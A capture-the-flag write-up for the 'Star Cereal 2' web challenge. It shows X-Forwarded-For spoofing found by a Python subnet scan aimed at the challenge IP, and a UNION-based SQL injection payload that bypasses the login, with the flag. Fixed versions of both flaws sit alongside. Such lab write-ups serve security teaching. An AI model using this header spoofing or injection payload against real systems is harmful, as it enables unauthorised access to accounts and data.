Star Cereal 2
Spoofable client IP address, SQL injection vulnerability

Description

Ha, that was sneaky! But I've patched the login so that people like you can't gain access anymore. Stop hacking us!
http://20.198.209.142:55045
The flag is in the flag format: STC{...}
Author: zeyu2001

Solution

In index.php, notice the following comment:
<!--
Star Cereal page by zeyu2001

TODO:
1) URGENT - fix login vulnerability by disallowing external logins (done)
2) Integrate admin console currently hosted at http://172.16.2.155
-->
Point 1 refers to the previous challenge. Point 2 is interesting: it leaks an internal address, 172.16.2.155, which gives us a subnet to work with later.
If we go to login.php, we get a 403 Forbidden page:
<h1>Forbidden</h1>
<p>Only admins allowed to login.</p>

Spoofable Client IP

The 403 message says only admins may log in, and the comment leaked an internal address, so a plausible guess is that the server decides who counts as an "admin" from the client IP.
A common misconfiguration when implementing such a filter is trusting the X-Forwarded-For header. The header exists so that a proxy or load balancer can tell the backend the originating client's address, but it is just another request header: whoever sends the request chooses its value, so an application that reads it without checking that the request actually arrived through its own proxy will accept any address we claim. Since the comment tells us one internal host is 172.16.2.155, the 172.16.2.0/24 subnet is the natural place to look for an allowed client IP.
Scanning that range (e.g. with Burp Suite Intruder) with the X-Forwarded-For header shows that setting
X-Forwarded-For: 172.16.2.24
returns the login page instead of the 403.

Burp Suite Intruder Scan

First, send the GET /login.php request to Intruder and set the payload position on the last octet of the X-Forwarded-For value, i.e. X-Forwarded-For: 172.16.2.§1§.
Then, configure the payload as a list of numbers from 1 to 255.
Run the attack and sort the output by the Status or Length column. The request with X-Forwarded-For: 172.16.2.24 stands out with a 200 OK response, and its body is the login page.
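The same scan written as a script, as an added example that is not part of the original writeup: it walks the /24, sends each address in X-Forwarded-For and keeps the ones the target answers 200 to. The sender is injectable so the scan logic can be exercised offline; the real sender uses urllib against the challenge URL from the page. The second half shows the server-side mistake the scan exploits next to a safer version (a hypothetical `trusted_proxies` set stands in for whatever the real reverse proxy would be).

```python
"""Spoof X-Forwarded-For across a /24 to find a client IP the filter accepts."""
import ipaddress
import urllib.error
import urllib.request
from typing import Callable, Iterable

# A sender takes (url, headers) and returns the HTTP status code.
Sender = Callable[[str, dict], int]


def http_status(url: str, headers: dict) -> int:
    """Real sender: one GET with the given headers. urllib raises on 4xx/5xx,
    so the code is pulled out of the exception instead."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def spoof_headers(client_ip: str) -> dict:
    """Headers that claim `client_ip` as the originating address."""
    return {"X-Forwarded-For": client_ip, "User-Agent": "Mozilla/5.0"}


def scan_xff(url: str, subnet: str, send: Sender = http_status) -> list:
    """Try every host address in `subnet` as the spoofed client IP and return
    the ones for which the target answers 200 instead of 403."""
    accepted = []
    for host in ipaddress.ip_network(subnet).hosts():
        if send(url, spoof_headers(str(host))) == 200:
            accepted.append(str(host))
    return accepted


# --- the server-side bug, and what it should have looked like ---------------

def client_ip_naive(remote_addr: str, headers: dict) -> str:
    """The misconfiguration: honours X-Forwarded-For from any TCP peer, so the
    'client IP' is whatever the requester typed into the header."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else remote_addr


def client_ip_trusted(remote_addr: str, headers: dict,
                      trusted_proxies: Iterable[str]) -> str:
    """Only honour the header when the peer is one of our own proxies, and
    take the address that proxy appended (the last hop), not the first value,
    which the original client can pre-fill."""
    if remote_addr not in set(trusted_proxies):
        return remote_addr
    xff = headers.get("X-Forwarded-For")
    if not xff:
        return remote_addr
    return xff.split(",")[-1].strip()


if __name__ == "__main__":
    # Hits the challenge target from the page; comment out to run offline.
    print(scan_xff("http://20.198.209.142:55045/login.php", "172.16.2.0/24"))
```

With `client_ip_trusted`, the spoofed header from an arbitrary Internet peer is ignored entirely, which is the check the challenge's filter lacks.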

SQL Injection

Once we have access to the login page, notice the login form fields.
<form action="/login.php" method="post">
<div class="form-group">
<label for="email">Email address</label>
<input type="email" class="form-control" id="email" name="email" placeholder="Enter email">
</div>
<div class="form-group">
<label for="pass">Password</label>
<input type="pass" class="form-control" id="pass" name="pass" placeholder="Enter password">
</div>
<button type="submit" class="btn btn-primary">Submit</button>
</form>
We need to submit an email and a pass parameter, still with the spoofed X-Forwarded-For header so we are not bounced back to the 403. The pass parameter turns out to be injectable: a UNION SELECT appended to it makes the login query return a row of our choosing, the check passes, and the response contains the flag.
POST /login.php HTTP/1.1
Host: localhost:55043
X-Forwarded-For: 172.16.2.24

...

Content-Type: application/x-www-form-urlencoded
Content-Length: 51

email=test&pass=test' UNION SELECT 'test', 'test';#
The flag is STC{w0w_you'r3_r3lly_a_l33t_h4x0r_bc1d4611be52117c9a8bb99bf572d6a7}.
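To see why that payload works, here is an added example (not code from the challenge or its author) that rebuilds the probable shape of the login query against an in-memory SQLite database. The table name, columns and the stored credentials are constructed; the real backend is unknown. The page's payload closes with `;#`, a MySQL-style comment, whereas SQLite only understands `--`, so the demo payload uses `-- ` to swallow the trailing quote and is otherwise identical. A parameterised version of the same query is shown alongside for contrast.

```python
"""UNION-based login bypass on a concatenated SQL query, and the fix."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the real users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin@starcereal.local', 'correct-horse')")
    return conn


def build_query(email: str, password: str) -> str:
    """Assumed shape of the original query: both fields pasted into the SQL."""
    return ("SELECT email, pass FROM users "
            f"WHERE email='{email}' AND pass='{password}'")


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """Login is granted if the query returns any row at all, so a UNION that
    manufactures a row is as good as a valid credential."""
    return conn.execute(build_query(email, password)).fetchone() is not None


def login_fixed(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """Parameterised query: the payload is compared literally as a password and
    never reaches the SQL parser as syntax."""
    row = conn.execute(
        "SELECT email, pass FROM users WHERE email=? AND pass=?",
        (email, password),
    ).fetchone()
    return row is not None


# SQLite form of the page's payload; on MySQL the trailing "-- " can be "#".
PAYLOAD = "test' UNION SELECT 'test', 'test'-- "


if __name__ == "__main__":
    db = make_db()
    print(build_query("test", PAYLOAD))
    print("vulnerable login with payload:", login_vulnerable(db, "test", PAYLOAD))
    print("fixed login with payload:     ", login_fixed(db, "test", PAYLOAD))
```

The first SELECT matches nothing (no user named test), the UNION contributes the row ('test', 'test'), and a check that only asks "did a row come back?" is satisfied. Note the `Content-Length: 51` in the captured request matches the page's body exactly, so the payload was sent as shown, `#` included.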